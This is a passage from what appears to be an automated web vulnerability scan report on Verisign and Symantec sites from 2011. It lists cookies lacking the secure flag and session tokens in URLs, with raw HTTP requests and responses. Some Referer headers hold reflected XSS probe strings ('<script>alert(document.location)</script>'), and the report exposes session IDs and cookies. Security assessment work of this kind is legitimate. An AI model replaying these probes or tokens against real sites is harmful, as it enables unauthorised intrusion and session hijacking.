var premiumSupportFee=0;var pciComplianceFee=0;var pricingMatrix=[];var validityObjFive=null;var validityObjFour=null;var validityObjThree=null;var validityObjTwo=null;var validityObjOne=null;var pro
...[SNIP]...

6.59. https://trust-center.verisign.com/rcm/verisign/scripts/utility.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/utility.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=648BC83CDB2A10DB4CE99F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/utility.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:34 GMT
Server: Apache
Set-Cookie: TLTHID=648BC83CDB2A10DB4CE99F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:09 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 8013
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

var menuItemCurrentlyHasFocus=false;function MM_findObj(n,d){var p,i,x;if(!d){d=document;}
if((p=n.indexOf("?"))>0&&parent.frames.length){d=parent.frames[n.substring(p+1)].document;n=n.substring(0,p)
...[SNIP]...

6.60. https://trust-center.verisign.com/rcm/verisign/style/brand.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/style/brand.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=63B1D50ADB2A10DB4CE69F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/style/brand.css HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:32 GMT
Server: Apache
Set-Cookie: TLTHID=63B1D50ADB2A10DB4CE69F6CAED9DACC; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:05 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 7437
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

@import "vrsn.css";
#vrsn_standard_bar{background-color:#9B0033;clear:both;color:#FFFFFF;font-size:.8em;height:2em;text-align:center;width:100%;}
#vrsn_standard_bar_footer{border-top:1px solid #EDEDEE
...[SNIP]...

6.61. https://trust-center.verisign.com/rcm/verisign/style/capture_payment.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/style/capture_payment.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=6655F87CDB2A10DB4CF09F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/style/capture_payment.css HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:37 GMT
Server: Apache
Set-Cookie: TLTHID=6655F87CDB2A10DB4CF09F6CAED9DACC; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 2075
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

/*import from capture_payment.css - Coakley 10_5_2010 */
.radio_button {width:180px;}
.blurb {padding-left:5px;padding-bottom:10px;}
#tax_exemption_section {margin-left:35px;}
.content_line { position
...[SNIP]...

6.62. https://trust-center.verisign.com/rcm/verisign/style/minimal_form.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/style/minimal_form.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=63B3241EDB2A10DB44A6B1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/style/minimal_form.css HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:32 GMT
Server: Apache
Set-Cookie: TLTHID=63B3241EDB2A10DB44A6B1847A7DDBAF; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 3324
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

#quick_signin_box {position:relative;top:0px;margin:0px;}
.minimal-form-gray, .minimal-form-gray * {background-color:gray;}
.minimal-form, .minimal-form-gray{border:solid 1px #5C554B;height:auto;t
...[SNIP]...

6.63. https://trust-center.verisign.com/rcm/verisign/style/module.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/style/module.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=63B20958DB2A10DB6A71CEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/style/module.css HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:32 GMT
Server: Apache
Set-Cookie: TLTHID=63B20958DB2A10DB6A71CEC4D1E75D2A; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 698
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

#ratepointbox{background-color:#FFFFFF;border:1px solid #999999;margin-bottom:10px;padding:1px;width:196px;}
#ratepointbox .header{background-image:url(../images/ratepoint_header_bg.gif);background-po
...[SNIP]...

6.64. https://trust-center.verisign.com/rcm/verisign/style/product_selector.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/style/product_selector.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=63B2FDB8DB2A10DB44A5B1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/style/product_selector.css HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:32 GMT
Server: Apache
Set-Cookie: TLTHID=63B2FDB8DB2A10DB44A5B1847A7DDBAF; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 9496
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

#comparison_chart_panel{position:absolute;right:20px;top:0;}
#product_ssp_ev{background-image:url(../images/SSP_EV.jpg);background-position:top;background-repeat:no-repeat;float:left;margin-bottom:0;
...[SNIP]...

6.65. https://trust-center.verisign.com/rcm/verisign/style/vrsn.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/style/vrsn.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=666769EADB2A10DB44B1B1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/style/vrsn.css HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=63B1D50ADB2A10DB4CE69F6CAED9DACC

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:37 GMT
Server: Apache
Set-Cookie: TLTHID=666769EADB2A10DB44B1B1847A7DDBAF; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 30719
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

body{color:#000;font-family:arial, helvetica, sans-serif;font-size:12px;height:100%;margin:0}
a:link,a:visited{color:#1446A8;text-decoration:underline}
h3{margin:0 0 0.8em;padding:0 0 0 1em;width:98%}
...[SNIP]...

6.66. https://www.verisign.com/assets/visual-sciences/vip/zig.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.verisign.com
Path:	/assets/visual-sciences/vip/zig.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

v1st=A410AF29B33CAB52; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/visual-sciences/vip/zig.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://idprotect.verisign.com/toolbar/activate.v
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:47:55 GMT
Server: Apache
Set-Cookie: v1st=A410AF29B33CAB52; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.com
Last-Modified: Wed, 19 Jan 2011 20:34:24 GMT
Accept-Ranges: bytes
Content-Length: 2602
Expires: Sun, 09 Oct 2011 21:47:55 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-javascript

//REFERENCE PAGE TAG
var ct = "<img src=";
var cd = "//www.verisign.com"; //this should contain the domain of the web site
var cu = "/assets/visual-sciences/vip/zag.gif?Log=1"; //this should contai
...[SNIP]...

6.67. https://www4.symantec.com/Vrt/wl previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www4.symantec.com
Path:	/Vrt/wl

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

SYMC_TRANS_ID=69836485@@1315604068690; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Vrt/wl?tu_id=akMg1303300545922330202 HTTP/1.1
Host: www4.symantec.com
Connection: keep-alive
Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps6ed59%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E0e8182bf4be
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621927_PCT-1315621927_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sq=%5B%5BB%5D%5D; s_pers=%20s_nr%3D1315621972496-New%7C1336357972496%3B%20event69%3Devent69%7C1336357972499%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/9

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Date: Fri, 09 Sep 2011 21:34:28 GMT
Content-type: text/html
X-atg-version: ATGPlatform/2006.3p3 [ DASLicense/0 DPSLicense/0 ]
Set-cookie: SYMC_TRANS_ID=69836485@@1315604068690; path=/
Location: https://symantec-corporation.com/servlet/campaignrespondent?_ID_=symnam.117&ACTIVITYCODE=113004
Content-Length: 97

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD>
<H1>302 Moved Temporarily</H1><BODY>
</BODY>

7. Session token in URL previous next
There are 15 instances of this issue:

https://idprotect.verisign.com/images/favicon.ico
https://idprotect.verisign.com/kaptcha.jpg
https://idprotect.verisign.com/scripts/global.js
https://idprotect.verisign.com/toolbar/activate.v
http://m.verisign.com/home.v
http://mbox3.offermatica.com/m2/verisign/mbox/standard
http://mbox3.offermatica.com/m2/verisign/ubox/image
http://player.ooyala.com/sas/authorized
https://renewals.symantec.com/renewals/images/icon-pop-up.gif
http://sales.liveperson.net/hc/2735064/
https://securitycenter.verisign.com/celp/enroll/retail
http://symantec.tt.omtrdc.net/m2/symantec/mbox/standard
https://trust-center.verisign.com/process/retail/trust_product_selector
http://vipmobile.verisign.com/images/favicon.ico
https://vipmobile.verisign.com/home.v

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

7.1. https://idprotect.verisign.com/images/favicon.ico previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://idprotect.verisign.com
Path:	/images/favicon.ico

Issue detail

The URL in the request appears to contain a session token within the query string:

https://idprotect.verisign.com/images/favicon.ico;jsessionid=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc

Request

GET /images/favicon.ico;jsessionid=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc HTTP/1.1
Host: idprotect.verisign.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 09 Sep 2011 21:45:45 GMT
Server: Apache
Location: https://idprotect.verisign.com/images/favicon.ico
Content-Length: 330
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://idprotect.veris
...[SNIP]...

7.2. https://idprotect.verisign.com/kaptcha.jpg previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://idprotect.verisign.com
Path:	/kaptcha.jpg

Issue detail

The URL in the request appears to contain a session token within the query string:

https://idprotect.verisign.com/kaptcha.jpg;jsessionid=B046ABA8417AE521ABF2DF2A83C9408F.moped1be-d1-tc

Request

GET /kaptcha.jpg;jsessionid=B046ABA8417AE521ABF2DF2A83C9408F.moped1be-d1-tc HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: https://idprotect.verisign.com/toolbar/activate.v
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: idprotect.verisign.com
Connection: Keep-Alive
Cookie: JSESSIONID=B046ABA8417AE521ABF2DF2A83C9408F.moped1be-d1-tc

Response

HTTP/1.0 301 Moved Permanently
Date: Fri, 09 Sep 2011 21:49:00 GMT
Server: Apache
Location: https://idprotect.verisign.com/kaptcha.jpg
Content-Length: 323
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://idprotect.veris
...[SNIP]...

7.3. https://idprotect.verisign.com/scripts/global.js previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://idprotect.verisign.com
Path:	/scripts/global.js

Issue detail

The URL in the request appears to contain a session token within the query string:

https://idprotect.verisign.com/scripts/global.js;jsessionid=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc

Request

GET /scripts/global.js;jsessionid=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc HTTP/1.1
Host: idprotect.verisign.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://idprotect.verisign.com/toolbar/home.v?141ab%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E41143d22db1=1
Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 09 Sep 2011 21:47:12 GMT
Server: Apache
Location: https://idprotect.verisign.com/scripts/global.js
Content-Length: 329
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://idprotect.veris
...[SNIP]...

7.4. https://idprotect.verisign.com/toolbar/activate.v previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://idprotect.verisign.com
Path:	/toolbar/activate.v

Issue detail

The response contains the following links that appear to contain session tokens:

https://idprotect.verisign.com/images/favicon.ico;jsessionid=4C45FEB27A5A8977451CA29A8776E476.moped1be-d1-tc
https://idprotect.verisign.com/kaptcha.jpg;jsessionid=4C45FEB27A5A8977451CA29A8776E476.moped1be-d1-tc
https://idprotect.verisign.com/scripts/global.js;jsessionid=4C45FEB27A5A8977451CA29A8776E476.moped1be-d1-tc

Request

GET /toolbar/activate.v HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: idprotect.verisign.com
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:48:59 GMT
Set-Cookie: JSESSIONID=4C45FEB27A5A8977451CA29A8776E476.moped1be-d1-tc; Path=/; Secure
Content-Type: text/html;charset=utf-8
Content-Length: 7564
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
...[SNIP]...
<meta http-equiv="Expires" content="0" />

<link rel="icon" href="/images/favicon.ico;jsessionid=4C45FEB27A5A8977451CA29A8776E476.moped1be-d1-tc"/>

<title>
...[SNIP]...
<link rel="stylesheet" type="text/css" media="print"
href="/common/styles/print.css" />

<script type="text/javascript"
src="/scripts/global.js;jsessionid=4C45FEB27A5A8977451CA29A8776E476.moped1be-d1-tc"></script>
...[SNIP]...
<br/>

<img id="kaptchaImage" src="/kaptcha.jpg;jsessionid=4C45FEB27A5A8977451CA29A8776E476.moped1be-d1-tc" alt="Click for a different one!" title="Click for a different one!" />  
<img id="kaptchaRefresh" src="/brand-verisign/images/ico_refresh_captcha.gif" alt="Click for a different one!" title="Click for a different one!" />
...[SNIP]...

7.5. http://m.verisign.com/home.v previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://m.verisign.com
Path:	/home.v

Issue detail

The URL in the request appears to contain a session token within the query string:

http://m.verisign.com/home.v;jsessionid=1695809E810A8CD4C2D73D9071CB7888.tomcat2

Request

GET /home.v;jsessionid=1695809E810A8CD4C2D73D9071CB7888.tomcat2 HTTP/1.1
Host: m.verisign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
